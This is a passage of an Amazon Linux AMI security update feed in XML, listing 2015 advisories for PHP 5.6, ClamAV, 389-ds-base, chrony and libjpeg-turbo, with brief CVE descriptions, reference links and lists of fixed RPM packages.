arch="i686"><filename>Packages/php55-mssql-5.5.25-1.101.amzn1.i686.rpm</filename></package><package name="php55-enchant" version="5.5.25" release="1.101.amzn1" epoch="0" arch="i686"><filename>Packages/php55-enchant-5.5.25-1.101.amzn1.i686.rpm</filename></package><package name="php55-mysqlnd" version="5.5.25" release="1.101.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mysqlnd-5.5.25-1.101.amzn1.i686.rpm</filename></package><package name="php55-cli" version="5.5.25" release="1.101.amzn1" epoch="0" arch="i686"><filename>Packages/php55-cli-5.5.25-1.101.amzn1.i686.rpm</filename></package><package name="php55-pdo" version="5.5.25" release="1.101.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pdo-5.5.25-1.101.amzn1.i686.rpm</filename></package><package name="php55" version="5.5.25" release="1.101.amzn1" epoch="0" arch="i686"><filename>Packages/php55-5.5.25-1.101.amzn1.i686.rpm</filename></package><package name="php55-devel" version="5.5.25" release="1.101.amzn1" epoch="0" arch="i686"><filename>Packages/php55-devel-5.5.25-1.101.amzn1.i686.rpm</filename></package><package name="php55-snmp" version="5.5.25" release="1.101.amzn1" epoch="0" arch="i686"><filename>Packages/php55-snmp-5.5.25-1.101.amzn1.i686.rpm</filename></package><package name="php55-xmlrpc" version="5.5.25" release="1.101.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xmlrpc-5.5.25-1.101.amzn1.i686.rpm</filename></package><package name="php55-mcrypt" version="5.5.25" release="1.101.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mcrypt-5.5.25-1.101.amzn1.i686.rpm</filename></package><package name="php55-recode" version="5.5.25" release="1.101.amzn1" epoch="0" arch="i686"><filename>Packages/php55-recode-5.5.25-1.101.amzn1.i686.rpm</filename></package><package name="php55-common" version="5.5.25" release="1.101.amzn1" epoch="0" arch="i686"><filename>Packages/php55-common-5.5.25-1.101.amzn1.i686.rpm</filename></package><package name="php55-bcmath" version="5.5.25" release="1.101.amzn1" epoch="0" arch="i686"><filename>Packages/php55-bcmath-5.5.25-1.101.amzn1.i686.rpm</filename></package><package name="php55-debuginfo" version="5.5.25" release="1.101.amzn1" epoch="0" arch="i686"><filename>Packages/php55-debuginfo-5.5.25-1.101.amzn1.i686.rpm</filename></package><package name="php55-embedded" version="5.5.25" release="1.101.amzn1" epoch="0" arch="i686"><filename>Packages/php55-embedded-5.5.25-1.101.amzn1.i686.rpm</filename></package><package name="php55-odbc" version="5.5.25" release="1.101.amzn1" epoch="0" arch="i686"><filename>Packages/php55-odbc-5.5.25-1.101.amzn1.i686.rpm</filename></package><package name="php55-mbstring" version="5.5.25" release="1.101.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mbstring-5.5.25-1.101.amzn1.i686.rpm</filename></package><package name="php55-ldap" version="5.5.25" release="1.101.amzn1" epoch="0" arch="i686"><filename>Packages/php55-ldap-5.5.25-1.101.amzn1.i686.rpm</filename></package><package name="php55-pgsql" version="5.5.25" release="1.101.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pgsql-5.5.25-1.101.amzn1.i686.rpm</filename></package><package name="php55-gmp" version="5.5.25" release="1.101.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gmp-5.5.25-1.101.amzn1.i686.rpm</filename></package><package name="php55-process" version="5.5.25" release="1.101.amzn1" epoch="0" arch="i686"><filename>Packages/php55-process-5.5.25-1.101.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-536</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-536: important priority package update for php56</title><issued date="2015-06-02 22:22:00" /><updated date="2015-06-02 22:33:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-4026:
It was found that certain PHP functions did not properly handle file names containing a NULL character. A remote attacker could possibly use this flaw to make a PHP script access unexpected files and bypass intended file system access restrictions.
1223422:
CVE-2015-4026 php: pcntl_exec() accepts paths with NUL character
CVE-2015-4025:
It was found that certain PHP functions did not properly handle file names containing a NULL character. A remote attacker could possibly use this flaw to make a PHP script access unexpected files and bypass intended file system access restrictions.
1223408:
CVE-2015-4025 php: CVE-2006-7243 regressions in 5.4+
CVE-2015-4024:
A flaw was found in the way PHP parsed multipart HTTP POST requests. A specially crafted request could cause PHP to use an excessive amount of CPU time.
1222485:
CVE-2015-4024 php: multipart/form-data request paring CPU usage DoS
CVE-2015-4022:
An integer overflow flaw leading to a heap based buffer overflow was found in the way PHP's FTP extension parsed file listing FTP server responses. A malicious FTP server could use this flaw to cause a PHP application to crash or, possibly, execute arbitrary code.
1223412:
CVE-2015-4022 php: integer overflow on reading FTP server data leading to heap overflow
1223412:
CVE-2015-4022 php: integer overflow leading to heap overflow when reading FTP file listing
CVE-2015-4021:
An integer underflow flaw leading to out-of-bounds memory access was found in the way PHP's Phar extension parsed Phar archives. A specially crafted archive could cause PHP to crash or, possibly, execute arbitrary code when opened.
1223425:
CVE-2015-4021 php: memory corruption in phar_parse_tarfile when entry filename starts with NULL
1223425:
CVE-2015-4021 php: memory corruption in phar_parse_tarfile caused by empty entry file name
CVE-2015-2326:
1207202:
CVE-2015-2326 pcre: heap buffer overflow in pcre_compile2()
CVE-2015-2325:
1207198:
CVE-2015-2325 pcre: heap buffer overflow in compile_branch()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2325" title="" id="CVE-2015-2325" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2326" title="" id="CVE-2015-2326" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4021" title="" id="CVE-2015-4021" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4022" title="" id="CVE-2015-4022" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4024" title="" id="CVE-2015-4024" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4025" title="" id="CVE-2015-4025" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4026" title="" id="CVE-2015-4026" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php56-enchant" version="5.6.9" release="1.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-enchant-5.6.9-1.112.amzn1.x86_64.rpm</filename></package><package name="php56-gmp" version="5.6.9" release="1.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gmp-5.6.9-1.112.amzn1.x86_64.rpm</filename></package><package name="php56-mysqlnd" version="5.6.9" release="1.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mysqlnd-5.6.9-1.112.amzn1.x86_64.rpm</filename></package><package name="php56-imap" version="5.6.9" release="1.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-imap-5.6.9-1.112.amzn1.x86_64.rpm</filename></package><package name="php56-pgsql" version="5.6.9" release="1.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pgsql-5.6.9-1.112.amzn1.x86_64.rpm</filename></package><package name="php56-common" version="5.6.9" release="1.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-common-5.6.9-1.112.amzn1.x86_64.rpm</filename></package><package name="php56" version="5.6.9" release="1.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-5.6.9-1.112.amzn1.x86_64.rpm</filename></package><package name="php56-soap" version="5.6.9" release="1.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-soap-5.6.9-1.112.amzn1.x86_64.rpm</filename></package><package name="php56-intl" version="5.6.9" release="1.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-intl-5.6.9-1.112.amzn1.x86_64.rpm</filename></package><package name="php56-debuginfo" version="5.6.9" release="1.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-debuginfo-5.6.9-1.112.amzn1.x86_64.rpm</filename></package><package name="php56-opcache" version="5.6.9" release="1.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-opcache-5.6.9-1.112.amzn1.x86_64.rpm</filename></package><package name="php56-embedded" version="5.6.9" release="1.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-embedded-5.6.9-1.112.amzn1.x86_64.rpm</filename></package><package name="php56-dba" version="5.6.9" release="1.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dba-5.6.9-1.112.amzn1.x86_64.rpm</filename></package><package name="php56-tidy" version="5.6.9" release="1.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-tidy-5.6.9-1.112.amzn1.x86_64.rpm</filename></package><package name="php56-mssql" version="5.6.9" release="1.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mssql-5.6.9-1.112.amzn1.x86_64.rpm</filename></package><package name="php56-fpm" version="5.6.9" release="1.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-fpm-5.6.9-1.112.amzn1.x86_64.rpm</filename></package><package name="php56-snmp" version="5.6.9" release="1.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-snmp-5.6.9-1.112.amzn1.x86_64.rpm</filename></package><package name="php56-ldap" version="5.6.9" release="1.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-ldap-5.6.9-1.112.amzn1.x86_64.rpm</filename></package><package name="php56-dbg" version="5.6.9" release="1.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dbg-5.6.9-1.112.amzn1.x86_64.rpm</filename></package><package name="php56-bcmath" version="5.6.9" release="1.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-bcmath-5.6.9-1.112.amzn1.x86_64.rpm</filename></package><package name="php56-xmlrpc" version="5.6.9" release="1.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xmlrpc-5.6.9-1.112.amzn1.x86_64.rpm</filename></package><package name="php56-process" version="5.6.9" release="1.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-process-5.6.9-1.112.amzn1.x86_64.rpm</filename></package><package name="php56-gd" version="5.6.9" release="1.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gd-5.6.9-1.112.amzn1.x86_64.rpm</filename></package><package name="php56-devel" version="5.6.9" release="1.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-devel-5.6.9-1.112.amzn1.x86_64.rpm</filename></package><package name="php56-mbstring" version="5.6.9" release="1.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mbstring-5.6.9-1.112.amzn1.x86_64.rpm</filename></package><package name="php56-recode" version="5.6.9" release="1.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-recode-5.6.9-1.112.amzn1.x86_64.rpm</filename></package><package name="php56-mcrypt" version="5.6.9" release="1.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mcrypt-5.6.9-1.112.amzn1.x86_64.rpm</filename></package><package name="php56-pspell" version="5.6.9" release="1.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pspell-5.6.9-1.112.amzn1.x86_64.rpm</filename></package><package name="php56-pdo" version="5.6.9" release="1.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pdo-5.6.9-1.112.amzn1.x86_64.rpm</filename></package><package name="php56-odbc" version="5.6.9" release="1.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-odbc-5.6.9-1.112.amzn1.x86_64.rpm</filename></package><package name="php56-cli" version="5.6.9" release="1.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-cli-5.6.9-1.112.amzn1.x86_64.rpm</filename></package><package name="php56-xml" version="5.6.9" release="1.112.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xml-5.6.9-1.112.amzn1.x86_64.rpm</filename></package><package name="php56-ldap" version="5.6.9" release="1.112.amzn1" epoch="0" arch="i686"><filename>Packages/php56-ldap-5.6.9-1.112.amzn1.i686.rpm</filename></package><package name="php56-bcmath" version="5.6.9" release="1.112.amzn1" epoch="0" arch="i686"><filename>Packages/php56-bcmath-5.6.9-1.112.amzn1.i686.rpm</filename></package><package name="php56-cli" version="5.6.9" release="1.112.amzn1" epoch="0" arch="i686"><filename>Packages/php56-cli-5.6.9-1.112.amzn1.i686.rpm</filename></package><package name="php56-intl" version="5.6.9" release="1.112.amzn1" epoch="0" arch="i686"><filename>Packages/php56-intl-5.6.9-1.112.amzn1.i686.rpm</filename></package><package name="php56-devel" version="5.6.9" release="1.112.amzn1" epoch="0" arch="i686"><filename>Packages/php56-devel-5.6.9-1.112.amzn1.i686.rpm</filename></package><package name="php56-common" version="5.6.9" release="1.112.amzn1" epoch="0" arch="i686"><filename>Packages/php56-common-5.6.9-1.112.amzn1.i686.rpm</filename></package><package name="php56-imap" version="5.6.9" release="1.112.amzn1" epoch="0" arch="i686"><filename>Packages/php56-imap-5.6.9-1.112.amzn1.i686.rpm</filename></package><package name="php56-gd" version="5.6.9" release="1.112.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gd-5.6.9-1.112.amzn1.i686.rpm</filename></package><package name="php56-mysqlnd" version="5.6.9" release="1.112.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mysqlnd-5.6.9-1.112.amzn1.i686.rpm</filename></package><package name="php56-mssql" version="5.6.9" release="1.112.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mssql-5.6.9-1.112.amzn1.i686.rpm</filename></package><package name="php56-enchant" version="5.6.9" release="1.112.amzn1" epoch="0" arch="i686"><filename>Packages/php56-enchant-5.6.9-1.112.amzn1.i686.rpm</filename></package><package name="php56-debuginfo" version="5.6.9" release="1.112.amzn1" epoch="0" arch="i686"><filename>Packages/php56-debuginfo-5.6.9-1.112.amzn1.i686.rpm</filename></package><package name="php56-process" version="5.6.9" release="1.112.amzn1" epoch="0" arch="i686"><filename>Packages/php56-process-5.6.9-1.112.amzn1.i686.rpm</filename></package><package name="php56-fpm" version="5.6.9" release="1.112.amzn1" epoch="0" arch="i686"><filename>Packages/php56-fpm-5.6.9-1.112.amzn1.i686.rpm</filename></package><package name="php56-pdo" version="5.6.9" release="1.112.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pdo-5.6.9-1.112.amzn1.i686.rpm</filename></package><package name="php56-odbc" version="5.6.9" release="1.112.amzn1" epoch="0" arch="i686"><filename>Packages/php56-odbc-5.6.9-1.112.amzn1.i686.rpm</filename></package><package name="php56-xml" version="5.6.9" release="1.112.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xml-5.6.9-1.112.amzn1.i686.rpm</filename></package><package name="php56-mcrypt" version="5.6.9" release="1.112.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mcrypt-5.6.9-1.112.amzn1.i686.rpm</filename></package><package name="php56-recode" version="5.6.9" release="1.112.amzn1" epoch="0" arch="i686"><filename>Packages/php56-recode-5.6.9-1.112.amzn1.i686.rpm</filename></package><package name="php56-dba" version="5.6.9" release="1.112.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dba-5.6.9-1.112.amzn1.i686.rpm</filename></package><package name="php56-xmlrpc" version="5.6.9" release="1.112.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xmlrpc-5.6.9-1.112.amzn1.i686.rpm</filename></package><package name="php56-pgsql" version="5.6.9" release="1.112.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pgsql-5.6.9-1.112.amzn1.i686.rpm</filename></package><package name="php56-mbstring" version="5.6.9" release="1.112.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mbstring-5.6.9-1.112.amzn1.i686.rpm</filename></package><package name="php56-pspell" version="5.6.9" release="1.112.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pspell-5.6.9-1.112.amzn1.i686.rpm</filename></package><package name="php56" version="5.6.9" release="1.112.amzn1" epoch="0" arch="i686"><filename>Packages/php56-5.6.9-1.112.amzn1.i686.rpm</filename></package><package name="php56-embedded" version="5.6.9" release="1.112.amzn1" epoch="0" arch="i686"><filename>Packages/php56-embedded-5.6.9-1.112.amzn1.i686.rpm</filename></package><package name="php56-gmp" version="5.6.9" release="1.112.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gmp-5.6.9-1.112.amzn1.i686.rpm</filename></package><package name="php56-soap" version="5.6.9" release="1.112.amzn1" epoch="0" arch="i686"><filename>Packages/php56-soap-5.6.9-1.112.amzn1.i686.rpm</filename></package><package name="php56-opcache" version="5.6.9" release="1.112.amzn1" epoch="0" arch="i686"><filename>Packages/php56-opcache-5.6.9-1.112.amzn1.i686.rpm</filename></package><package name="php56-tidy" version="5.6.9" release="1.112.amzn1" epoch="0" arch="i686"><filename>Packages/php56-tidy-5.6.9-1.112.amzn1.i686.rpm</filename></package><package name="php56-snmp" version="5.6.9" release="1.112.amzn1" epoch="0" arch="i686"><filename>Packages/php56-snmp-5.6.9-1.112.amzn1.i686.rpm</filename></package><package name="php56-dbg" version="5.6.9" release="1.112.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dbg-5.6.9-1.112.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-537</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-537: medium priority package update for clamav</title><issued date="2015-06-02 22:23:00" /><updated date="2015-06-02 22:36:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-2668:
ClamAV before 0.98.7 allows remote attackers to cause a denial of service (infinite loop) via a crafted xz archive file.
1217208:
CVE-2015-2668 clamav: Infinite loop condition on a crafted "xz" archive file
CVE-2015-2222:
ClamAV before 0.98.7 allows remote attackers to cause a denial of service (crash) via a crafted petite packed file.
1217207:
CVE-2015-2222 clamav: crash on crafted petite packed file
CVE-2015-2221:
ClamAV before 0.98.7 allows remote attackers to cause a denial of service (infinite loop) via a crafted y0da cryptor file.
1217206:
CVE-2015-2221: clamav Infinite loop condition on crafted y0da cryptor file
CVE-2015-2170:
The upx decoder in ClamAV before 0.98.7 allows remote attackers to cause a denial of service (crash) via a crafted file.
1217209:
CVE-2015-2170: clamav: Crash in upx decoder with crafted file
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2170" title="" id="CVE-2015-2170" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2221" title="" id="CVE-2015-2221" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2222" title="" id="CVE-2015-2222" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2668" title="" id="CVE-2015-2668" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="clamav" version="0.98.7" release="1.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-0.98.7-1.12.amzn1.x86_64.rpm</filename></package><package name="clamav-filesystem" version="0.98.7" release="1.12.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-filesystem-0.98.7-1.12.amzn1.noarch.rpm</filename></package><package name="clamav-update" version="0.98.7" release="1.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-update-0.98.7-1.12.amzn1.x86_64.rpm</filename></package><package name="clamav-server-sysvinit" version="0.98.7" release="1.12.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-server-sysvinit-0.98.7-1.12.amzn1.noarch.rpm</filename></package><package name="clamav-scanner" version="0.98.7" release="1.12.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-scanner-0.98.7-1.12.amzn1.noarch.rpm</filename></package><package name="clamd" version="0.98.7" release="1.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamd-0.98.7-1.12.amzn1.x86_64.rpm</filename></package><package name="clamav-server" version="0.98.7" release="1.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-server-0.98.7-1.12.amzn1.x86_64.rpm</filename></package><package name="clamav-milter" version="0.98.7" release="1.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-milter-0.98.7-1.12.amzn1.x86_64.rpm</filename></package><package name="clamav-milter-sysvinit" version="0.98.7" release="1.12.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-milter-sysvinit-0.98.7-1.12.amzn1.noarch.rpm</filename></package><package name="clamav-db" version="0.98.7" release="1.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-db-0.98.7-1.12.amzn1.x86_64.rpm</filename></package><package name="clamav-debuginfo" version="0.98.7" release="1.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-debuginfo-0.98.7-1.12.amzn1.x86_64.rpm</filename></package><package name="clamav-lib" version="0.98.7" release="1.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-lib-0.98.7-1.12.amzn1.x86_64.rpm</filename></package><package name="clamav-data-empty" version="0.98.7" release="1.12.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-data-empty-0.98.7-1.12.amzn1.noarch.rpm</filename></package><package name="clamav-data" version="0.98.7" release="1.12.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-data-0.98.7-1.12.amzn1.noarch.rpm</filename></package><package name="clamav-scanner-sysvinit" version="0.98.7" release="1.12.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-scanner-sysvinit-0.98.7-1.12.amzn1.noarch.rpm</filename></package><package name="clamav-devel" version="0.98.7" release="1.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-devel-0.98.7-1.12.amzn1.x86_64.rpm</filename></package><package name="clamd" version="0.98.7" release="1.12.amzn1" epoch="0" arch="i686"><filename>Packages/clamd-0.98.7-1.12.amzn1.i686.rpm</filename></package><package name="clamav-db" version="0.98.7" release="1.12.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-db-0.98.7-1.12.amzn1.i686.rpm</filename></package><package name="clamav-debuginfo" version="0.98.7" release="1.12.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-debuginfo-0.98.7-1.12.amzn1.i686.rpm</filename></package><package name="clamav" version="0.98.7" release="1.12.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-0.98.7-1.12.amzn1.i686.rpm</filename></package><package name="clamav-lib" version="0.98.7" release="1.12.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-lib-0.98.7-1.12.amzn1.i686.rpm</filename></package><package name="clamav-server" version="0.98.7" release="1.12.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-server-0.98.7-1.12.amzn1.i686.rpm</filename></package><package name="clamav-devel" version="0.98.7" release="1.12.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-devel-0.98.7-1.12.amzn1.i686.rpm</filename></package><package name="clamav-update" version="0.98.7" release="1.12.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-update-0.98.7-1.12.amzn1.i686.rpm</filename></package><package name="clamav-milter" version="0.98.7" release="1.12.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-milter-0.98.7-1.12.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-538</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-538: important priority package update for 389-ds-base</title><issued date="2015-06-02 22:24:00" /><updated date="2015-06-02 22:37:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-1854:
A flaw was found in the way Red Hat Directory Server performed authorization of modrdn operations. An unauthenticated attacker able to issue an ldapmodrdn call to the directory server could use this flaw to perform unauthorized modifications of entries in the directory server.
1209573:
CVE-2015-1854 389-ds-base: access control bypass with modrdn
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1854" title="" id="CVE-2015-1854" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="389-ds-base" version="1.3.3.1" release="16.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-1.3.3.1-16.41.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-devel" version="1.3.3.1" release="16.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-devel-1.3.3.1-16.41.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.3.1" release="16.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-debuginfo-1.3.3.1-16.41.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-libs" version="1.3.3.1" release="16.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-libs-1.3.3.1-16.41.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-devel" version="1.3.3.1" release="16.41.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-devel-1.3.3.1-16.41.amzn1.i686.rpm</filename></package><package name="389-ds-base-libs" version="1.3.3.1" release="16.41.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-libs-1.3.3.1-16.41.amzn1.i686.rpm</filename></package><package name="389-ds-base" version="1.3.3.1" release="16.41.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-1.3.3.1-16.41.amzn1.i686.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.3.1" release="16.41.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-debuginfo-1.3.3.1-16.41.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-539</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-539: medium priority package update for chrony</title><issued date="2015-06-02 22:25:00" /><updated date="2015-06-02 22:42:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-1853:
1209572:
CVE-2015-1853 chrony: authentication doesn't protect symmetric associations against DoS attacks
CVE-2015-1822:
chrony before 1.31.1 does not initialize the last "next" pointer when saving unacknowledged replies to command requests, which allows remote authenticated users to cause a denial of service (uninitialized pointer dereference and daemon crash) or possibly execute arbitrary code via a large number of command requests.
1209632:
CVE-2015-1822 chrony: uninitialized pointer in cmdmon reply slots
CVE-2015-1821:
Heap-based buffer overflow in chrony before 1.31.1 allows remote authenticated users to cause a denial of service (chronyd crash) or possibly execute arbitrary code by configuring the (1) NTP or (2) cmdmon access with a subnet size that is indivisible by four and an address with a nonzero bit in the subnet remainder.
1209631:
CVE-2015-1821 chrony: Heap out of bound write in address filter
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1821" title="" id="CVE-2015-1821" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1822" title="" id="CVE-2015-1822" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1853" title="" id="CVE-2015-1853" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="chrony-debuginfo" version="1.31.1" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/chrony-debuginfo-1.31.1-1.13.amzn1.x86_64.rpm</filename></package><package name="chrony" version="1.31.1" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/chrony-1.31.1-1.13.amzn1.x86_64.rpm</filename></package><package name="chrony-debuginfo" version="1.31.1" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/chrony-debuginfo-1.31.1-1.13.amzn1.i686.rpm</filename></package><package name="chrony" version="1.31.1" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/chrony-1.31.1-1.13.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-540</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-540: low priority package update for libjpeg-turbo</title><issued date="2015-06-11 08:08:00" /><updated date="2015-06-11 08:09:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-9092:
1169845:
CVE-2014-9092 libjpeg-turbo: denial of service via specially-crafted JPEG file
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9092" title="" id="CVE-2014-9092" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libjpeg-turbo-debuginfo" version="1.2.90" release="5.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/libjpeg-turbo-debuginfo-1.2.90-5.10.amzn1.x86_64.rpm</filename></package><package name="libjpeg-turbo-devel" version="1.2.90" release="5.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/libjpeg-turbo-devel-1.2.90-5.10.amzn1.x86_64.rpm</filename></package><package name="libjpeg-turbo-utils" version="1.2.90" release="5.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/libjpeg-turbo-utils-1.2.90-5.10.amzn1.x86_64.rpm</filename></package><package name="turbojpeg-devel" version="1.2.90" release="5.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/turbojpeg-devel-1.2.90-5.10.amzn1.x86_64.rpm</filename></package><package name="libjpeg-turbo-static" version="1.2.90" release="5.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/libjpeg-turbo-static-1.2.90-5.10.amzn1.x86_64.rpm</filename></package><package name="libjpeg-turbo" version="1.2.90" release="5.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/libjpeg-turbo-1.2.90-5.10.amzn1.x86_64.rpm</filename></package><package name="turbojpeg" version="1.2.90" release="5.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/turbojpeg-1.2.90-5.10.amzn1.x86_64.rpm</filename></package><package name="libjpeg-turbo-static" version="1.2.90" release="5.10.amzn1" epoch="0" 